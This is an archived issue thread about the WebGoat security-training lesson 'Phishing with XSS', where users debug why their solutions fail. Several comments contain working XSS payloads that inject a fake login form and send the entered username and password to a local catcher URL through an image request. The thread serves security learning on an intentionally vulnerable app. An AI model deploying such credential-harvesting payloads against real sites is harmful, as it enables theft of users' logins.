Closed GoogleCodeExporter closed 8 years ago
Here are a few of the things I tried for Phishing w/ XSS. Neither of the first two would work when pasted in the box, but they triggered the check-off when in an HTML page by themselves and the login information was submitted.
* foo<script>function muahahaha(){ alert("User Name = " + document.forms[0].user.value + "; Password = " + document.forms[0].pass.value); XSSImage=new Image(); XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user=" + document.forms[0].user.value + "&password=" + document.forms[0].pass.value;}</script><form><br><br>login:<br><br>Enter Username:<br><input type="text" name="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="muahahaha()"></form>
* bar<form><br><br>login:<br><br>Enter Username:<br><input type="text" name="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="var XSSImage=new Image(); XSSImage.src='http://localhost/webgoat/catcher?PROPERTY=yes&user=' + this.form.user.value + '&password=' + this.form.pass.value;"></form>
* Substituting the variables with their values in the URL (http://localhost/webgoat/catcher?PROPERTY=yes&user=guest&password=guest) and pasting that in the box works fine, though that doesn't illustrate the vulnerability.
I tried this on Firefox on Ubuntu. I isolated the problem to the inability to access "document.forms[0].user.value" in the lesson page, but it is unclear to me why the standalone works. Let me know if you figure this out.
Original comment by Lysand...@gmail.com on 21 Mar 2010 at 7:21
Original comment by mayhe...@gmail.com on 24 Mar 2010 at 8:34
I could fix this by giving my form inputs an Id and accessing them via document.getElementById('username') etc.
Original comment by linux.ni...@gmail.com on 9 Jun 2010 at 7:18
I face the same issue. Phishing with XSS doesn't work. I am using Windows 7. If I click all three of Hint, Show Params and Show Cookies, it creates an additional login form above, and that works, which seems odd. Please fix this.
Original comment by nishikum...@gmail.com on 25 Apr 2011 at 1:22
The problem is with "document.forms[0].user.value", as was mentioned above. There is another form before the one that needs to be changed, so "forms[0]" targets the wrong one.
Using "document.form.user.value" (the form we want is named "form") works. You should also be able to use "document.forms[1].user.value". I've already fixed this in the hints and solutions; I just haven't pushed the update yet. I'll switch this to "fixed" once I commit the updates.
Original comment by X71...@gmail.com on 4 Aug 2011 at 2:42
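
The index shift described in the comment above, modelled as an added example (not WebGoat code and not part of the original thread). The markup strings and the form names `existing` and `phish` are constructed, and a small regex scan stands in for the browser's `document.forms` collection.

```javascript
// Constructed sample markup (not WebGoat's real page): the lesson page already
// contains one form before the point where the search term is reflected.
const INJECTED = '<form name="phish"><input type="text" name="user">' +
                 '<input type="password" name="pass"></form>';
const STANDALONE = '<html><body>' + INJECTED + '</body></html>';
const LESSON = '<html><body><form name="existing"><input type="text" name="q">' +
               '</form><p>Results for: ' + INJECTED + '</p></body></html>';

// Minimal model of document.forms: forms in document order, each with its
// name attribute and the names of its input controls.
function listForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const name = (/\bname\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]) || [])[1] || null;
    const controls = [];
    const inputRe = /<input\b[^>]*?\bname\s*=\s*["']?([^"'\s>]+)/gi;
    let c;
    while ((c = inputRe.exec(m[2])) !== null) controls.push(c[1]);
    forms.push({ name, controls });
  }
  return forms;
}

// Does the form reached by an index-based lookup contain the given control?
function hasControlAtIndex(html, index, control) {
  const form = listForms(html)[index];
  return Boolean(form && form.controls.includes(control));
}

// Name-based lookup does not depend on how many forms precede the target.
function indexOfNamedForm(html, name) {
  return listForms(html).findIndex((f) => f.name === name);
}

// Standalone page: forms[0] is the form with "user".
// Lesson page: forms[0] is the pre-existing form, so ".user" is undefined there.
console.log(hasControlAtIndex(STANDALONE, 0, 'user'), hasControlAtIndex(LESSON, 0, 'user'));
```
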
Original comment by mayhe...@gmail.com on 24 Apr 2012 at 11:08
I solved this by inserting my port number 8080 after localhost, like this:
XSSImage.src="http://127.0.0.1:8080/WebGoat/catcher?PROPERTY=yes&user="+
document.phish.user.value + "&password=" + document.phish.pass.value + "";
Original comment by Mint...@gmail.com on 5 Jul 2013 at 11:57
Original issue reported on code.google.com by ol.batard@gmail.com on 16 Feb 2010 at 6:48